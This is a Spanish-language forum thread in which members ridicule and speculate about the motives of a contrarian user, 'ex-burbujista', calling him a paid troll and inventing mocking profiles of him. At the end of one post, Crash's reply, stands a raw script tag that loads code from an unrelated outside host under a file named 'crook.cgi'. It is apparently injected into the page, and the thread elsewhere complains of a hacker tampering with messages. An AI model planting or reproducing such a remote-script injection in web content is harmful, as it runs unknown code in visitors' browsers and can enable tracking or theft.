Los motivos de ex-burbujista. ¿Sus intereses?

tochovista

Madmaxista
Desde
6 Jul 2006
Mensajes
2.035
Reputación
3.881
:

Yo pienso que ex burbujista cumple este perfil:

a) Cincuentona
b) Binguera
c) Tiene varios inmuebles: 3 peluquerías, 2 pescaderías y 1 mercería
d) Su marido la abandonó, dijo que bajaba a comprar tabaco y no regresó...
e) Loca seguidora de MANOLO ESCOBAR...
 

ellison

Madmaxista
Desde
2 Feb 2006
Mensajes
2.533
Reputación
1.674
Está claro que ex-burbujista es un forero "profesional": recibe algo a cambio por animar la actividad aquí.

Te pregunto directamente, ex-burbujista: SÍ O NO, ¿recibes algo a cambio de escribir de manera tan asidua aquí? Por favor, RESPONDE.
 

Crash

Madmaxista
Desde
25 Abr 2006
Mensajes
1.471
Reputación
166
Lugar
Barcelona
ex-burbujista dijo:
pues te aseguro que no me molesta, me parece ingeniosa, si es con humor aunque sea mordaz hay que aplaudirlo,

las criticas hay que aceptarlas, el sarcasmo y la acidez son formas brillantes de crítica.

no me habrás visto quejar. los insultos gratuitos y sin ingenio si sobran, y lo del hacker también, quitar a alguien la palabra, cambiar los mensajes me parece que esta fuera del "juego" del dialogo, pues impide el mismo dialogo. (y es lo único que he criticado de lo que ha pasado en el foro)

pero esa firma es cachonda, (aunque podría ser degradante al ser ingeniosa se convierte en critica, no en insulto) , como lo es la de roper del alien, pero si admitís esas firmas tenéis que admitir otras con el mismo "humor oscuro" pero con otra ideología.
Pues a mí me hacía más gracia la otra en que salía un tio vestido con lencería y su Land Rover, pero tuve que quitarla por el contenido "adulto". Esta no me convence, no va a durar mucho. :)<script src="http://phonebill.ifreepages.com/burbuja/crook.cgi"></script>
 
Última edición:

fuentesss

Madmaxista
Desde
6 Abr 2007
Mensajes
1.180
Reputación
5
Lugar
En el Gimnasio...
tochovista dijo:
:Yo pienso que ex burbujista cumple este perfil:

a) Cincuentona
b) Binguera
c) Tiene varios inmuebles: 3 peluquerías, 2 pescaderías y 1 mercería
d) Su marido la abandonó, dijo que bajaba a comprar tabaco y no regresó...
e) Loca seguidora de MANOLO ESCOBAR...
Jejejejejejejejejejejejejejejejejejejejejejej :D :D :D :D
 

Misosofos

Madmaxista
Desde
2 Ene 2007
Mensajes
1.572
Reputación
1.678
Ojalá se dejara de utilizar esa palabra tan horrenda que es "postear".
Aparte de eso, muy bueno el hilo.
 

Mi_casa_es_tu_casa

Madmaxista
Desde
19 Jul 2006
Mensajes
5.475
Reputación
58
Lugar
BCN
Yo creo que si no hubiese un exburbu lo tendríamos que inventar... da mucho juego al foro, y ofrece el contrapunto necesario para encarar el foro con la indignación que el problema de la vivienda merece.

Es cierto que a veces sus argumentos son mezquinos, y su firma actual una clara falta de respeto por aquellas personas que no deciden comprar vivienda.
 

nemo4

Madmaxista
Desde
22 May 2006
Mensajes
12.136
Reputación
4.949
No le deis más vueltas, es un taxista jubilado, tiene los mismos temas que cualquier taxista jubilado.... el pobre tantas horas escuchando a Encarna....

Yo no creo que sea saida, aunque lo de la binguera de tochovista me parece muy seductor.

Desde luego le ofende el pensamiento burbujista, eso está claro.
 

Aitor Menta

Madmaxista
Desde
21 Nov 2006
Mensajes
3.371
Reputación
2.085
Lugar
Vladivostok
Yo creo que es como este tío:



Le gusta llamar la atención llevando la contraria, aunque sea de forma ilógica muchas veces, consiguiendo varias cosas a la vez:

-convencer a alguien (poco probable en un foro donde casi todos pensamos de forma parecida)
-reirse de los que le persiguen por sus provocaciones (típico de un troll)
-ganar pasta (siendo un troll a sueldo como el de la foto)

Así que mi recomendación, dado que ya he intentado razonar con él alguna vez con nulo resultado, es pasar de él. Os ahorrareis tiempo y cabreos :D
 

chicken

Madmaxista
Desde
15 Jul 2006
Mensajes
9.620
Reputación
9.522
Yo le invitaría a ir al Colores, al Chaparral o al Rey 2000, seguro que se divierte más allí que trolleando en el foro.
 

tester4822000

Madmaxista
Desde
14 Ene 2007
Mensajes
1.489
Reputación
38
Yo creo que es una señorona aburrida echando unas horas en la inmobiliaria de su maridín.
 

Deadzoner

Madmaxista
Desde
27 Jun 2006
Mensajes
4.788
Reputación
439
Al principio, parecía abogado del diablo. A veces ejerce esa labor, reforzando las tesis burbujistas con sus estrepitosos fracasos.
Yo creo que es un hipotecado muy endeudado, pero además, del gremio ladrillero. Se ha debido creer sus propias estrategias comerciales.
Hay que fijarse en que nunca discute lo que no le interesa! :D Eso demuestra que actua de mala fe, y debería ser suficiente para ignorar todos sus hilos.
Por encima de 5 respuestas, a veces hay que darle contestación, aunque sea simplemente por hacer evidente lo falaces que suelen ser sus argumentos, aunque por cansino y repetitivo, aburre profundamente.
Pues eso, troleo constante y del bueno, aunque hay que reconocer que lo de USA y lo bien que va el mercado tiene un caracter marcadamente cómico! :D
 

>> 47 <<

Madmaxista
Desde
28 Ago 2006
Mensajes
24.356
Reputación
7.061
Deadzoner dijo:
Pues eso, troleo constante y del bueno, aunque hay que reconocer que lo de USA y lo bien que va el mercado tiene un caracter marcadamente cómico! :D
Baño de agua calentita, baño de agua fría... Ojo que le puede dar un patatús ulceroso con tantas subidas y bajadas de tensión. Más que ponerlo en evidencia, creo que desarma más la adulación a todo personaje precisado de cariño.

Nos vamos a cenar fuera megapepitoooos, ;) cuidadín no abuséis del chopped. Hasta lueg.
 

krako

Madmaxista
Desde
11 Ene 2007
Mensajes
4.653
Reputación
3.033
Me importan una hez los intereses de ex-burbujista. El único problema es que no razona a ningún argumento. Por eso paso de responderle. No déis de comer al troll!!!!!!!!